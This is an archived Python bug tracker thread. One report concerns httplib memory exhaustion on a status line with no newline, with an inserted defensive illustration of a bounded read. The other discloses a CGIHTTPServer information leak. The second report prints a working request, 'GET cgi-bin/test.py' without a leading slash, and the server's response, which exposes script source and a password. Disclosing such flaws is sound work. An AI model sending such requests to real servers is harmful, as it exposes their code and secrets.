[issue6791] httplib read status memory usage

2009-08-28 Thread sumar

New submission from sumar m.sucaj...@gmail.com:

While writing some code I discovered some behaviour of httplib. When we
connect to a host which doesn’t respond with a status line but just
sends data, httplib may consume more and more memory, because when we
execute
h = httplib.HTTPConnection('host')
h.connect()
h.request('GET', '/')
r = h.getresponse()
httplib tries to read one line from the host. If the host doesn’t send a newline
character ('\n'), httplib reads more and more data. In my tests httplib
could consume all of 4GB of memory and the python process was killed by
oom_killer.
The resolution is to limit the maximum amount of data read when getting
the response. I have performed some tests:
I received 3438293 from hosts located in the network. The longest valid
response line is
HTTP/1.1 500 ( The specified Secure Sockets Layer (SSL) port is not
allowed. ISA Server is not configured to allow SSL requests from this
port. Most Web browsers use port 443 for SSL requests.  )\r\n
and it has 197 characters.
In RFC2616 in section 6.1 we have:
“The first line of a Response message is the Status-Line, consisting of
the protocol version followed by a numeric status code and its
associated textual phrase, with each element separated by SP characters.
No CR or LF is allowed except in the final CRLF sequence.
   Status-Line = HTTP-Version SP Status-Code SP Reason-Phrase CRLF
(..)The Reason-Phrase is intended to give a short textual description of
the Status-Code.”
So limiting the maximum status line length to 256 characters is a solution
to this problem. It doesn’t break compatibility with RFC 2616.

My patch was written originally on python2.4, but I’ve tested it on
python2.6:
[...@host python2.6]$ patch --dry-run -i /home/ms/httplib.patch
patching file httplib.py
Hunk #1 succeeded at 209 (offset 54 lines).

--
components: Library (Lib)
files: httplib.patch
keywords: patch
messages: 92027
nosy: m.sucajtys
severity: normal
status: open
title: httplib read status memory usage
type: resource usage
versions: Python 2.4, Python 2.5, Python 2.6
Added file: http://bugs.python.org/file14795/httplib.patch

___
Python tracker rep...@bugs.python.org
http://bugs.python.org/issue6791
___
___
Python-bugs-list mailing list
Unsubscribe: 
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
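
An added illustration, not part of the original report and not the submitted httplib.patch: a bounded status-line read in Python 3, using the 256-character limit proposed above. The names read_status_line, LineTooLong and EndlessStream are assumptions made for this example; EndlessStream is a constructed peer that never sends '\n'.

```python
import io

MAX_STATUS_LINE = 256  # limit proposed in the report; counts the CRLF too


class LineTooLong(Exception):
    """No line terminator arrived within the allowed number of bytes."""


class EndlessStream(io.RawIOBase):
    """Constructed peer: sends data forever and never sends a newline."""

    def __init__(self):
        super().__init__()
        self.bytes_sent = 0

    def readable(self):
        return True

    def readinto(self, buf):
        n = len(buf)
        buf[:n] = b"A" * n
        self.bytes_sent += n
        return n


def read_status_line(fp, limit=MAX_STATUS_LINE):
    """Return the status line from fp, reading at most limit + 1 bytes."""
    # readline(size) stops at '\n' or after size bytes, whichever comes
    # first, so a peer that never sends '\n' cannot grow the buffer.
    line = fp.readline(limit + 1)
    if len(line) > limit:
        raise LineTooLong("status line longer than %d bytes" % limit)
    if not line.endswith(b"\n"):
        raise ValueError("connection closed before end of status line")
    return line.decode("iso-8859-1").rstrip("\r\n")


if __name__ == "__main__":
    good = io.BytesIO(b"HTTP/1.1 200 OK\r\nServer: example\r\n\r\n")
    print(read_status_line(good))
    raw = EndlessStream()
    try:
        read_status_line(io.BufferedReader(raw, buffer_size=512))
    except LineTooLong as exc:
        print("rejected:", exc, "after", raw.bytes_sent, "bytes from peer")
```

The amount pulled from the peer is bounded by the reader's buffer size, not by how long the peer keeps sending.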



[issue6791] httplib read status memory usage

2009-08-28 Thread sumar

sumar m.sucaj...@gmail.com added the comment:

I've also checked the patch against the code in the svn tree:
wget http://svn.python.org/projects/python/trunk/Lib/httplib.py
patch -p0 -i httplib.patch --dry-run
patching file httplib.py
Hunk #1 succeeded at 209 (offset 54 lines).
Hunk #2 succeeded at 303 (offset 10 lines).




[issue2254] Python CGIHTTPServer information disclosure

2008-03-07 Thread sumar

New submission from sumar:


Summary:

An information disclosure flaw exists in standard python CGIHTTPServer
module. 
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).


Description:

Requesting a CGI script (test.py in the example) without / at the beginning of the URL
causes the script content/code to be returned instead of the script being executed.
It could lead to disclosure of some secret information, e.g. a password.


Exploit code:

Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.


correct request:

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.



--
components: Library (Lib)
messages: 63361
nosy: m.sucajtys
severity: normal
status: open
title: Python CGIHTTPServer information disclosure
type: security
versions: Python 2.5

__
Tracker [EMAIL PROTECTED]
http://bugs.python.org/issue2254
__